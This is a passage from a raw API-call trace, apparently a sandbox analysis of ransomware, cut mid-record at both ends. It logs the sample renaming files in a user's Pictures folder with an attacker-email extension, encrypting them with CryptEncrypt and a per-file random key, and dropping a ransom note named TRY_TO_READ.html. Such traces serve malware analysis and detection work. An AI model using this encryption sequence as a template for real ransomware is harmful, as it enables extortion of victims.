hFile=0x4c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1441a [0161.148] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.148] GetProcessHeap () returned 0x2e0000 [0161.148] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.148] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.148] WriteFile (in: hFile=0x4c4, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.149] WriteFile (in: hFile=0x4c4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.149] WriteFile (in: hFile=0x4c4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.150] ReadFile (in: hFile=0x4c4, lpBuffer=0x3af410, nNumberOfBytesToRead=0x1441a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3af410*, lpNumberOfBytesRead=0x2acf9c8*=0x1441a, lpOverlapped=0x0) returned 1 [0161.152] SetFilePointer (in: hFile=0x4c4, lDistanceToMove=-82970, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.152] WriteFile (in: hFile=0x4c4, lpBuffer=0x30d0048*, nNumberOfBytesToWrite=0x1441a, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x1441a, lpOverlapped=0x0) returned 1 [0161.152] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.153] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.153] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fgWz5.bmp", dwFileAttributes=0x80) returned 1 [0161.153] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fgWz5.bmp") returned 49 [0161.153] GetProcessHeap () returned 0x2e0000 [0161.153] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc8) returned 0x319d30 [0161.153] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fgWz5.bmp" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fgWz5.bmp") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fgWz5.bmp" [0161.153] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fgWz5.bmp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fgWz5.bmp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fgWz5.bmp.12781717671972518758.ex_parvis@aol.com.AIR" [0161.153] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fgWz5.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fgwz5.bmp"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fgWz5.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fgwz5.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.156] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fgWz5.bmp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fgwz5.bmp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c4 [0161.156] GetProcessHeap () returned 0x2e0000 [0161.156] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.156] GetFileSizeEx (in: hFile=0x4c4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=59763) returned 1 [0161.156] SetFilePointer (in: hFile=0x4c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xe973 [0161.156] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.156] GetProcessHeap () returned 0x2e0000 [0161.156] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.156] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.156] WriteFile (in: hFile=0x4c4, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.157] WriteFile (in: hFile=0x4c4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.157] WriteFile (in: hFile=0x4c4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.157] ReadFile (in: hFile=0x4c4, lpBuffer=0x3af410, nNumberOfBytesToRead=0xe973, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3af410*, lpNumberOfBytesRead=0x2acf9c8*=0xe973, lpOverlapped=0x0) returned 1 [0161.158] SetFilePointer (in: hFile=0x4c4, lDistanceToMove=-59763, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.158] WriteFile (in: hFile=0x4c4, lpBuffer=0x30d0048*, nNumberOfBytesToWrite=0xe973, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesWritten=0x2acf9c8*=0xe973, lpOverlapped=0x0) returned 1 [0161.160] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.160] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.160] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EV6jESnvs0k.jpg", dwFileAttributes=0x80) returned 1 [0161.160] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EV6jESnvs0k.jpg") returned 55 [0161.160] GetProcessHeap () returned 0x2e0000 [0161.160] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd4) returned 0x319d30 [0161.160] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EV6jESnvs0k.jpg" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EV6jESnvs0k.jpg") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EV6jESnvs0k.jpg" [0161.160] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EV6jESnvs0k.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EV6jESnvs0k.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EV6jESnvs0k.jpg.12781717671972518758.ex_parvis@aol.com.AIR" [0161.160] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EV6jESnvs0k.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ev6jesnvs0k.jpg"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EV6jESnvs0k.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ev6jesnvs0k.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.178] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\EV6jESnvs0k.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ev6jesnvs0k.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c4 [0161.178] GetProcessHeap () returned 0x2e0000 [0161.178] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.178] GetFileSizeEx (in: hFile=0x4c4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=93463) returned 1 [0161.178] SetFilePointer (in: hFile=0x4c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x16d17 [0161.178] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.178] GetProcessHeap () returned 0x2e0000 [0161.178] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.178] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.179] WriteFile (in: hFile=0x4c4, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.179] WriteFile (in: hFile=0x4c4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.179] WriteFile (in: hFile=0x4c4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.180] ReadFile (in: hFile=0x4c4, lpBuffer=0x3af410, nNumberOfBytesToRead=0x16d17, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3af410*, lpNumberOfBytesRead=0x2acf9c8*=0x16d17, lpOverlapped=0x0) returned 1 [0161.181] SetFilePointer (in: hFile=0x4c4, lDistanceToMove=-93463, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.181] WriteFile (in: hFile=0x4c4, lpBuffer=0x30d0048*, nNumberOfBytesToWrite=0x16d17, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x16d17, lpOverlapped=0x0) returned 1 [0161.183] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.183] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.183] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini", dwFileAttributes=0x80) returned 1 [0161.183] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned 51 [0161.183] GetProcessHeap () returned 0x2e0000 [0161.183] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xcc) returned 0x3470a0 [0161.183] lstrcpyW (in: lpString1=0x3470a0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" [0161.184] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0161.184] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.186] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c4 [0161.186] GetProcessHeap () returned 0x2e0000 [0161.186] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3470a0 | out: hHeap=0x2e0000) returned 1 [0161.186] GetFileSizeEx (in: hFile=0x4c4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=504) returned 1 [0161.186] SetFilePointer (in: hFile=0x4c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1f8 [0161.187] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.187] GetProcessHeap () returned 0x2e0000 [0161.187] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.187] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.187] WriteFile (in: hFile=0x4c4, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.188] WriteFile (in: hFile=0x4c4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.188] WriteFile (in: hFile=0x4c4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.188] ReadFile (in: hFile=0x4c4, lpBuffer=0x32f868, nNumberOfBytesToRead=0x1f8, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x32f868*, lpNumberOfBytesRead=0x2acf9c8*=0x1f8, lpOverlapped=0x0) returned 1 [0161.188] SetFilePointer (in: hFile=0x4c4, lDistanceToMove=-504, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.188] WriteFile (in: hFile=0x4c4, lpBuffer=0x31d01e0*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesWritten=0x2acf9c8*=0x1f8, lpOverlapped=0x0) returned 1 [0161.188] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.188] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.188] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3WbiuLININsNF2g1Ah2M.jpg", dwFileAttributes=0x80) returned 1 [0161.188] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3WbiuLININsNF2g1Ah2M.jpg") returned 64 [0161.188] GetProcessHeap () returned 0x2e0000 [0161.189] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe6) returned 0x3a7428 [0161.189] lstrcpyW (in: lpString1=0x3a7428, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3WbiuLININsNF2g1Ah2M.jpg" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3WbiuLININsNF2g1Ah2M.jpg") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3WbiuLININsNF2g1Ah2M.jpg" [0161.189] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3WbiuLININsNF2g1Ah2M.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3WbiuLININsNF2g1Ah2M.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3WbiuLININsNF2g1Ah2M.jpg.12781717671972518758.ex_parvis@aol.com.AIR" [0161.189] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3WbiuLININsNF2g1Ah2M.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\3wbiulininsnf2g1ah2m.jpg"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3WbiuLININsNF2g1Ah2M.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\3wbiulininsnf2g1ah2m.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.191] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\3WbiuLININsNF2g1Ah2M.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\3wbiulininsnf2g1ah2m.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c4 [0161.191] GetProcessHeap () returned 0x2e0000 [0161.191] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7428 | out: hHeap=0x2e0000) returned 1 [0161.191] GetFileSizeEx (in: hFile=0x4c4, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=72509) returned 1 [0161.191] SetFilePointer (in: hFile=0x4c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x11b3d [0161.191] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.191] GetProcessHeap () returned 0x2e0000 [0161.191] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.191] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.192] WriteFile (in: hFile=0x4c4, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.192] WriteFile (in: hFile=0x4c4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.192] WriteFile (in: hFile=0x4c4, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.193] ReadFile (in: hFile=0x4c4, lpBuffer=0x3af410, nNumberOfBytesToRead=0x11b3d, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3af410*, lpNumberOfBytesRead=0x2acf9c8*=0x11b3d, lpOverlapped=0x0) returned 1 [0161.194] SetFilePointer (in: hFile=0x4c4, lDistanceToMove=-72509, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.194] WriteFile (in: hFile=0x4c4, lpBuffer=0x30d0048*, nNumberOfBytesToWrite=0x11b3d, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesWritten=0x2acf9c8*=0x11b3d, lpOverlapped=0x0) returned 1 [0161.196] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x109a3a90, ftCreationTime.dwHighDateTime=0x1d4c5c1, ftLastAccessTime.dwLowDateTime=0x95bd9560, ftLastAccessTime.dwHighDateTime=0x1d4d457, ftLastWriteTime.dwLowDateTime=0x95bd9560, ftLastWriteTime.dwHighDateTime=0x1d4d457, nFileSizeHigh=0x0, nFileSizeLow=0x1441a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XceHf M6rpZrREqSKm.bmp", cAlternateFileName="XCEHFM~1.BMP")) returned 0xffffffff [0161.196] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x109a3a90, ftCreationTime.dwHighDateTime=0x1d4c5c1, ftLastAccessTime.dwLowDateTime=0x95bd9560, ftLastAccessTime.dwHighDateTime=0x1d4d457, ftLastWriteTime.dwLowDateTime=0x95bd9560, ftLastWriteTime.dwHighDateTime=0x1d4d457, nFileSizeHigh=0x0, nFileSizeLow=0x1441a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XceHf M6rpZrREqSKm.bmp", cAlternateFileName="XCEHFM~1.BMP")) returned 0xffffffff [0161.196] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x97882990, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97882990, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e498 [0161.196] FindNextFileW (in: hFindFile=0x35e498, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x97882990, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97882990, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.196] FindNextFileW (in: hFindFile=0x35e498, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0161.196] FindNextFileW (in: hFindFile=0x35e498, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97882990, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97882990, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97882990, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0161.197] FindNextFileW (in: hFindFile=0x35e498, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97882990, 